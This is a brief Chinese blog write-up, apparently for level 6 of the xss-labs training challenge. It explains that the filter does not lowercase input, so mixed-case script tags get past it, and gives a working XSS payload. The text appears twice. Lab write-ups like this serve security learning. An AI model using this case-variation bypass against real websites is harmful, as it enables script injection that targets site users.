1.直接查看源码
发现没有使用strtolower()函数进行转换为小写
2.那么很简单,大小写绕过就好了
payload:
" ><sCRipt>alert('XSS')</sCript>
1.直接查看源码
发现没有使用strtolower()函数进行转换为小写
2.那么很简单,大小写绕过就好了
payload:
" ><sCRipt>alert('XSS')</sCript>
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:http://0verflow.cn/index.php/archives/1687/
[…] xss-labs level 6 […]
1
1